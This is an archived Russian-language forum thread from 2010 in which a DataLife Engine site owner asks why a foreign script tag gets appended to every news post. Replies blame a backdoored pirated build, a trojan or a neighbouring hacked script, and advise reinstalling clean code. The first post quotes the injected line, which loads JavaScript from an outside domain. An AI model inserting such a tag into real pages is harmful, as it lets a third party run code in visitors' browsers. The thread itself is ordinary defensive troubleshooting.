Бормотухи.НЕТ

Бормотухи.НЕТ (http://www.bormotuhi.net/index.php)
-   DataLife Engine (http://www.bormotuhi.net/forumdisplay.php?f=129)
-   -   [Вопрос] При добавлении новости добавляется код левого скрипта. Как это убрать ? (http://www.bormotuhi.net/showthread.php?t=9547)

efr07 26.09.2010 11:38
При добавлении новости добавляется код левого скрипта. Как это убрать ?
 
Я добавляю новость а когда допустим захожу её редактировать в полной и короткой новости добавляется строчка <script src="http://tvoyatajna.msk.ru/injs.820cee7448076a85c6b791f82a6adcfc/" type="text/javascript"></script> ! ъ

что делать ? как от этого избавиться ?

Serberg 26.09.2010 13:54
efr07, самый простой способ - это взять нормальный движок DLE и поставить. Я уже кажется писал о прелестях говносборок и т.п. Некоторые особо умные личности писали что это круто и что там уже все собрано и делать ничего не надо )).

Я думаю что данный скрипт - это только одно из многих что ты нашел. Как на счет блэкдора и т.п. ? Мой совет - выбрасывай этот скрипт.

А если не хочешь то придется искать скрипт либо в базе, либо в файлах. Где точно сказать нельзя или можно спросить у автора сего детища.

efr07 26.09.2010 14:20
Цитата:
Сообщение от Serberg (Сообщение 210936)
efr07, самый простой способ - это взять нормальный движок DLE и поставить. Я уже кажется писал о прелестях говносборок и т.п. Некоторые особо умные личности писали что это круто и что там уже все собрано и делать ничего не надо )).

Я думаю что данный скрипт - это только одно из многих что ты нашел. Как на счет блэкдора и т.п. ? Мой совет - выбрасывай этот скрипт.

А если не хочешь то придется искать скрипт либо в базе, либо в файлах. Где точно сказать нельзя или можно спросить у автора сего детища.
так раньше такого не было ! только щас появилось !

Serberg 26.09.2010 19:59
Цитата:
Сообщение от efr07 (Сообщение 210943)
так раньше такого не было ! только щас появилось !
Тогда есть 2 варианта. Либо код был добавлен заранее, что мало вероятно, либо есть в движке блэкдур, через который могли зайти к тебе в гости и наградить такой гадостью. Я помню сборки от MID Team славились такими штучками.

Угадать на 100% откуда это взялось - нельзя, но дыра где то есть - это однозначно. У меня форум 2 раза турки взламывали, я репу чесал, думал как, перерыл немеренно инфы. А оказалось ломали через DLE, который лежал в соседней папке с форумом.

Злой 27.09.2010 01:07
Не стоит исключать возможность присутствия на компе трояна, который добавляет во все POST запросы свои ссылочки ))
Винда форева!
Впервые обнаружил такое пару месяцев назад, когда одна юзерша одного из моих сайтов начала постить вполне приличные коментарии со ссылка на всякие какашечные сайты ))

tanka1380 27.09.2010 01:20
Цитата:
Впервые обнаружил такое пару месяцев назад, когда одна юзерша одного из моих сайтов начала постить вполне приличные коментарии со ссылка на всякие какашечные сайты ))
У меня такое тоже было. Хостер помог избавиться. Торян влез через разрешенные жи-эсы в личке на треккере. А треккер в соседней папке на фтп.
--------------------------------------------------------------------
кстати. До сих пор есть остаточек от галеры, "Цезарь" называется. Никак не удалить из админки. Вроде и не мешает, а вот, что-то не совсем спокойно.

cassper 27.09.2010 10:40
Оффтоп

Stalker 27.09.2010 17:33
100-пудово троян, у меня тоже такое было. Перелопатил ручками весь код. На хосте всё снёс и заного залил чистый код.

ЗЫ: правда не в дле. В Дле много файлов задействованно для добавлеия новости. Ручками тяжело будет...


Текущее время: 23:23. Часовой пояс GMT +3.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc. Перевод: zCarot

Время генерации страницы 0.06256 секунды с 8 запросами